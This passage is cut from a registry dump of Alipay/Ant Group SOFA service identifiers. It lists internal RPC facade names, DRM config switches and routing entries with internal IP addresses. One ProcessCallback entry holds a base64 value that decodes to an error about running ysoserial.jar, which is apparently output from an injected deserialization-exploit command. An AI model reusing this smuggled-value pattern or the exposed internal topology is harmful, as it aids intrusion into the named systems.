common.service.facade.CertServiceSpiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acpmscore.facade.ProjectCustomerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pushcore.facade.PushManuConnectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jiuzhou.client.spi.PaasActionDispatcher:1.0:scheduler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableVsar,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudprod.facade.search.OpsCldSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.141.229#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.custview.facade.antgroup.AgResourceViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@kbasset#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.mrchiscore:name=com.alipay.mrchiscore.generic.switch.maxMsgRetryTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.AdHocLoanForceRepayDrmResource.unsetForceArList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.lifecore.common.service.facade.lifeapp.LifeAppOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promobench.common.service.facade.service.GrayOrderMangeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.hades.core.service.contract.ContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewProtocolQueryService:1.0:microloan_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insbffweb:name=com.alipay.insbffweb.chair.Config.claimImgCheckSkewValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.guardian_client:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.maxBurstSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insmarketingcore.common.service.facade.InsMarketingMetadataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.45.73.138#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:afsc_tis_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetcore.common.service.risk.facade.LiabilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.176.62#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.opscloudcore.common.service.facade.iteration.ChangeIterationRelationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.114.51#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.superapi.common.core.client.AppInvokeService:1.0:instasset@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_169.254.45.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.lego.common.service.facade.data.AlarmOpenApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insmobile:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckPayloads,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.mrchpromoprod.facade.activity.ActivityInfoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.zcache.tbase.cardbinMdmTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custcenter.service.facade.kafka.KafkaMessageManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promodmp.service.facade.asset.UserAssetRecallFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finnet.service.facade.flux.spi.FinnetNotifyRservice:1.0:instpayFinnetNotifyRservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.common.service.facade.comment.TagQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.pointcert.PointCertService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.minicrowd.MiniTagPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.169#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbasecore.service.basic.question.facade.BasicQuestionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promokernel.common.manage.facade.api.PrizeTypeManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_DW_ADC#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.customscenter:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.faultInUserIdLocateValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.baitiaocore.common.service.facade.api.BaitiaoPledgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.PcardConsultFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.registry.ConfregRegistryServiceTest#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openitemcore.common.service.facade.api.management.dataasset.DataAssetDefineMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.guabus.common.service.facade.api.gua.GuaTreatyFileManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.211.202#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfocore.common.service.facade.fop.api.mng.CrowdTagMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.finbatch.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.nodejs.ConsumerService:1.0:antbuservicev2-app@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cdp.common.service.facade.space.api.CdpSystemConfigApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.supergw.service.facade.transaction.MessageReceiveService:1.0:ifccardcenter_openapi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@fincoretechdss#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zpdcore:name=com.alipay.fc.prodquery.common.service.ldc.drm.PdcoreZoneRouteConfigDRM.isOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:paylink@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.relation.RelationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.service.facade.common.IFundModelFacade:1.0:bankAccountBalanceFundModel@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.disableSchemeSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_INSCHARITYPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilerc.common.service.facade.insight.CubeRefDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fapcore.facade.search.AssetFeatureSearchFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.data.process.facade.codeexectask.CodeExecTaskService:1.0:data-process@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.biz.service.impl.schedule.InsCommercialTouchTaskDRM.taskDemotionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.prodcore.service.api.service.ServiceConfigureQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bizfund.common.service.facade.manage.api.CfgWhiteListQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopprod.common.service.facade.pidbook.PidBookQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.QcServiceTrackFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finassetprod.common.facade.BubbleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchportalcore.common.service.incomestatistics.facade.api.UserFeedbackGzoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:alipaymember@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:fin.redeem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:mrchiscore_adjustSubmitRiskProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBackForLdc:1.0:filebridge@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditschedule.service.facade.online.OnlineScheduleTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cicada.bizlogicide.common.service.facade.api.BizLogicProjectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mshopprod.common.service.item.facade.ItemCateApplyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.hotdata.api.HotDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ccdc.common.service.facade.CardInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.shop.triple.TripleCheckShopService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:cashier.product.mobile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finslip:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.noAvailableServerCheckIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.mktBaseInfoSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepmgw.common.service.spi.api.SyncSpiService:1.0:mobilechat@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finlsmicrogw.common.service.facade.gateway.api.MicroGatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.TransferService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.messagefusion.facade.api.UidTbaseCZoneCalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:loopExchangeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.FinfoSignService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityservice.facade.activeservice.spi.IvrResultNotifyFacade:1.0:ropcn@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opensupport.common.service.facade.qa.QaGuessAskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iMatchfacadeAntProcessCallback2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:pcmerchantprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_172.21.104.43#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:definprodcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfocore.common.service.facade.fop.api.mng.ScenePageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:mobileapp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.commodity.BumngCommodityOrderRecordManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.ProcessActionFacade:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.ding.DingUserQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.query.fund.api.QueryConfigRuleService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.api.RemindSettingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.paymentmng:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.iecpprod.common.service.facade.api.PayQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcore.common.service.facade.trustlogin.KbTrustLoginService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csassistant.service.facade.api.AssistantResolveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.revcore:name=com.alipay.revcore.common.drm.FinacDrmData.checkDwTaskNodeStatusParam,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.159.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.security.dresource.SecurityCommonDrm.refererWhiteUrls,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zcbprod.common.service.facade.activity.service.SpreadActivityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.hainaprod.common.service.facade.api.mini.market.UniMarketMerchantFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insxhcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.ops.client.ifxtrade.OpsIfxtradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinquotationprod.common.service.falcon.facade.api.TrendFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifcommon.uniquery.facade.UniQueryService:1.0:enterprisecif@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.206#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.23.252.98#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialportal.web.task.rpc.facade.activity.PunishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.instasset.common.service.facade.partner.role.PartnerRoleRelationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.InferenceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.seekers.facade.spis.EntityDiagnosisService:1.0:riskdatacenter_capacitySCureDagnosisService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nfcc.common.service.facade.DecenteralizedRouteFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_1225#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.prodquery.common.service.api.ContractQueryClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.OfflinepayRecordLogServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insopenprod.common.service.facade.api.InsOpenApiTemplateConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.PromocenterBussinessParamsDrmResource.recommendActivityConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.portrait.facade.DevicePortraitQueryFacade:1.0:xview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:aliminiabilityprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.pfunddts.common.facade.api.FundBaseCodeMpFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.zdal.ldc.tair.poscoreTairCache.tbaseClientWarmup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mrchprod.common.service.facade.tag.MrchprodLabelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.AntVipDefaultAppName:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.adanti.common.service.facade.AntiDecisionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.97.42#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.zdataquery.common.service.facade.hbase.FinComposeExchangeWithdrawHbaseQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_UNIBASE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.242.158#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alsc.growth.anteater.hsf.api.NewUserHomeService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promoguard.common.service.facade.risk.api.LineageTopologyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:riskxm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.57#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.socialcore.facade.category.CategoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.126#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antfeaturelib.common.facade.service.BizSystemService:1.0:publicDomain_antdsr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gffund.common.service.facade.api.developer.BizConfigQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbcontentprod.common.service.facade.api.content.ContentProdQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.preprocess.HtmlCleanFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordercore:name=com.alipay.ordercore.event.config.singlePartitionNumPerTask,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.124.154.251#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.riskmng:name=com.alipay.riskmng.biz.platform.task.complainevent.drm.ComplainInfoDrmResource.complainTypeValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.etetestcore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.serverGrayPercent,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.ipay.imerchprod.globalsite.facade.api.MerchantQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINLSMICROGW#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alphasec.compass.record.facade.KmiQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalReliableDrm.turnOffSendBackupMessage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.73.186.179#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acoffercenter.common.service.facade.offer.OfferAttrManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.insmobile:name=com.alipay.insmobile.drm.insmobiledrmhandler.yfxInActive,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.successParkIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.iaassettrans.facade.iaasset.api.IaAssetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.operation.OperationTargetPropertyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.InterworkOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","antpim@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.55.142#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.69.213.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.itemextends.ItemExtendsQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.17#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:RXJyb3I6IFVuYWJsZSB0byBhY2Nlc3MgamFyZmlsZSB5c29zZXJpYWwuamFyCg==@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.gateway.GatewayFacade:1.0:opensupport_support_osAccessCategoryGateway@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:pullBlockLoader@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.mutualtask.MutualtaskBackServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_CR#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cfpcenter.emc.common.service.facade.api.AemcTemplateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.girisk.strategy.service.facade.api.strategy.StrategyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserAccountArQueryService:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.alphad.common.service.facade.datamng.api.AdfDataProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.cdp.common.service.facade.space.api.CdpSpaceObjectManageApiService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.15.229.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finance.filefactory.sevice.FileFactoryEventListener:1.0:poscore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.TranslateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bcm.common.service.facade.ICertificateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.config.managment.BackStageManagmentService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_F_IENTITYFUNDCONTROL#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.88.144.123#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.mif.common.service.facade.decision.MerchantDecisionQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudlego:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.alideviceinfo.biz.service.DeviceTotalInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.opencore:name=com.alipay.antvip.client.internal.drm.DrmControl.restrainStrategy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antemc.service.facade.TroubleEventSyncFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.BusinessSystemService:1.0:businessSystemService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.OptCodeManager:1.0:antyixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.middlewareSwitch:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableGlobalCrc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:appxcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acccenter.common.service.facade.uat.UTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","id.dana.bizcenter.common.service.facade.api.BizAggregatorGoodsManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.amcs.distribution.facade.AmcsDistributionService:1.0:grayscaleAmcsDistributionService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.Arch:name=com.alipay.tradeexprod.service.integration.drm.resource.TradeCoreSwitchDecisionResource.masterController,version=1.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobileiclib.common.service.facade.admin.service.SceneAdminFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.finfocore.FinfocoreShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.admin.AdminSPFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.finsupport.component.cache.masterdata.drm.MasterdataDRM.unknowTypeFinanceExchangeCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","NS_Servers_TP_MYTEST_DRAWLOTTERY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.mydds.zdatabusDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.unimetaservice.facade.api.LabelFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:clearingcenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yuemaprod.common.facade.service.cdrm.CdrmMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:antchaos@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finorm.core.service.guardian.data.AfsDataCoreService:1.0@DEFAULT#@#DEFAULT_INSTA